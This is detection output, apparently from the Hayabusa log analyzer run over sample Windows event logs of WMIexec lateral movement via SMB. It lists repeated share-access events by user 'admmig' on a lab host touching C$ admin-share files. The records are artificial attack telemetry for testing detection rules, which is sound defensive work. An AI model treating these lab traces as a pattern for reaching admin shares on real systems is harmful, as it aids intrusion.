2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0f95ad97e3260801c998976fb3a0e0e1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\4febdd9160ebfd86d00365dbdaca9054  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#\32aee6654d81a07e698f9ee18c886a2a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\65e679add728957b62f4bbba59d88386  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3e17b0be5e7a03853d44d996d366e88b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\2abf386e286ec43711933fbe3e652014  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\6ef9bbadb5c7087da45798a762683eeb  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#\ed68489987b413410ccb94c6e704f6b4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.772 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\183eaaded316165bfbd32a991e4e8c8a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security\ba6ea4732f569e0674d6a43a82de5cc2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\09e0258d6e4a9d467c32dc8ac58766f2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\c97638c574cae07911907fa19e2aeedd  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.803 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.819 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\e9302436a2c607db888bcb3b14ebba8e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\5e015d37aa3fdc75648e9d00d44d13ac  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.850 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.866 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\3c06d012b88601107a4449fb04067a20  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\67f143e1f5d81dae33879b84e0035cad  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\03d76bf2a39a57e8bed74e782c62fd1c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\ee53227bcc4430088d0b560752c1cd02  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\39bc23d9592ef276c70a36ef0311070a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\6d5f82d8178e3d8e9931e70dce584863  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\95c749867e5f72a09ed1e59a57931301  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web\90285827b1300835ca1aaff1dff83a01  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\3dde15282321aa41c609dc7f7a5f1af5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\61d489d8a768782ce394f299dcc0e4bb  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\f2c2cff3fa34c990079298396b1ec1fc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\4b7763786015950c44dbba0ff26b883e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\af89139de3b87146c705fa989eeaa4b1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
